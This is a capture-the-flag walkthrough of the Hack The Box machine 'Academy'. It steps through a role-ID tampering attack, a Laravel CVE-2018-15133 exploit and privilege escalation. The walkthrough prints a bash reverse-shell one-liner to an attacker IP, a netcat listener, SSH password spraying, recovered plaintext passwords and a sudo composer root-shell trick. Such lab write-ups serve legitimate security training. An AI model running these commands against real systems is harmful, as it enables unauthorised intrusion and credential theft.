Academy

Last updated 1 year ago

Academy

Hi all, the primary purpose of this write-up is to practice scripting skills when possible, and try to be less reliant on already-built tools

Port scanning

10.10.10.215

We will start by enumerating the ports on the target machine, to do so, we can write a Python script that will enumerate the ports and perform banner grabbing to identify services running

We can run the following script with the following

python3 Portscanner.py 10.10.10.215 1-1000

This script checks ports given in a range
Performs banner grabbing to identify services running on the machine

From what we can tell we have

SSH
webserver running (Apache/2.4.41)
- Most likely a Ubuntu server
- we can add the hostname "academy.htb" to our hosts file

sudo vi /etc/hosts

to write and quit in the Vim editor

esc
:wq

Now we can navigate to the web server

Web Server (Apache)

First thing, we are greeted with a web page with two options

from wappalyzer we can confirm the web page uses PHP and it is indeed a Ubuntu server

with this information we can do some directory busting to find any hidden directories for this we are going to use Feroxbuster, to install feroxbuster install Rust onto our system

curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
source $HOME/.cargo/env
cargo install feroxbuster

to find hidden directories we can run the following command

feroxbuster -u http://academy.htb -t 5 -L 5 -n -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php

we are using seclists to provide our wordlist
we want to add the PHP extension since we now the web page uses php

we found one interesting directory

admin.php

within the login.php common credentials are not successful

Admin:Admin
admin:password
admin:Password123!

within the register.php let's register an account and see what access we have

logging in with the user we just created we are greeted with a static page with little to no functionality

Lets catch the web request and see what is being sent to the server when we register an account, instead of using burp or ZAP we are going to catch the request using a tool called mitmproxy where we can use its python API and script our attack

for our proxy we need to set up a few things

once installed in our browser we need to configure the plugin to redirect traffic through our proxy

within foxyproxy click Options -> Add

follow the configurations

we need to install mitm certificate in the terminal run mtimproxy

mitmproxy

within your browser settings search certificates → certificate manager → import → within your downloads directory click on the certificate from mitm → tick the box “Trust this CA to identify websites"

Now we can activate mitmproxy

mitmproxy --mode regular@8081

let's register another user

we will register the user

within the terminal, we will see a POST request from /register.php

We can just click on the request and we can see the parameters being sent to the server

what of real interest is the "roleid" parameter being equal to 0, Now what if we register another account and set "roleid" to be equal to 1

for this, we can write a Python script to automate catching the request and modifying the parameter using mitm's API

mitmproxy -s role_id_changer --mode regular@8081

Now lets register a new user

if we look at the recent POST request in our terminal we can see the changes made

we have successfully changed roleid from a 0 to a 1

let's try our new user creds within the admin.php page

we can successfully login in and we are greeted with what looks like a planner

Already we have some juicy details looks like we have some usernames and a subdomain

users

cry0l1t3
mrb3n

subdomain

dev-staging-01.academy.htb

let's add the subdomain to our /etc/hosts

looks to be an open-source web application framework called Laravel
from the page, we can see a lot of information showing up

from a quick Google search, we have a good hunch that Laravel is vulnerable to CVE-2018-15133

we can use the following exploit

we can clone the repo into our working directory

sudo git clone https://github.com/aljavier/exploit_laravel_cve-2018-15133.git

cd into the repo and install the requirements.txt

pip3 install -r requirements.txt

for the exploit to work, we need the API_KEY which we found within the Laravel app

In preparation of our reverse shell let's setup a netcat listener

nc -lvnp 9001

now for the exploit, we will use a one-liner bash tcp reverse shell

python3 pwn_laravel.py -c "bash -c 'bash -i >&/dev/tcp/10.10.16.4/9001 0>&1'" http://dev-staging-01.academy.htb dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=

we have specified the command we want to run on the system (bash reverse shell) the url and API_key

we should have a hit on our netcat listner

Privilege Escalation

In our new shell, we are present as a low-level user

Our next move is to find a way to elevate our privileges, and progressively search our way through if we look at the /var/www/html/academy/ directory we will find a hidden folder .env

ls -al /var/www/html/academy

we will find the .env file which at times can contain sensitive material, in our case it does

mySup3rP4s5w0rd!!

we found a unique password, next lets search the /etc/passed file to find users on the system

cat /etc/passwd

from what we can see we have multiple users

21y4d
ch4p
cry0l1t3
egre55
g0blin
mrb3n

Now that we have a list of users and a password lets script a ssh_password_sprayer

we'll create a file containing our user list and a file containing, once that is done we can run our script as follows

python3 ssh_pass_sprayer.py 10.10.10.215 user.txt passlist.txt

We get a hit for successful creds

cry0l1t3: mySup3rP4s5w0rd!!

we can SSH as cry0l1t3

ssh cry0l1t3@10.10.10.215

Privilege Escalation as cry0l1t3

from here the user.txt is within the /home/cry0l1t3 directory

lets upgrade our shell

python3 -c "import pty;pty.spawn('/bin/bash')"

when we look at the id of our user

we can see our user is part of the group "adm" group, being part of the "adm" group usually members have permission to read log files inside /var/log

lets focus on the /var/log/audit logs for this we can create a simple bash script to search for keywords comm="su" and comm="sudo"

we do need to create this script from our local machine and then transfer it over to Once we have our script ready to go we need to set up a python server for us to grab from our shell

local machine python3 server

python3 -m http.server 8888

from our target machine, we need to cd into the /tmp directory and we will use wget to retrieve the script

cd /tmp && wget http://10.10.16.4:8888/grepper.sh

we need to give it execute permissions

chmod +x grepper.sh

now we just need to run it

./grepper.sh

we do find something interesting in the results

what we have highlighted is a log entry but what we are most interested is the
comm="su": This indicates the command that triggered the event. In this example, the su command was executed.
data=6D7262336E5F41634064336D79210A: This part contains additional data associated with the event, typically in hexadecimal format. The meaning of this data can vary depending on the specific event.

lets convert this hex value to ASCII using python script

we have a possible password

mrb3n_Ac@d3my!

let's change our user to mrb3n

su mrb3n

we are now user mrb3n

Privilege Escalation via mrb3n

let's fix our shell

python3 -c "import pty;pty.spawn('/bin/bash')"

let's check our current sudo privs

sudo -l

TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x

we are now root

PreviousIrked HTB NextHTB Endgames

Last updated 1 year ago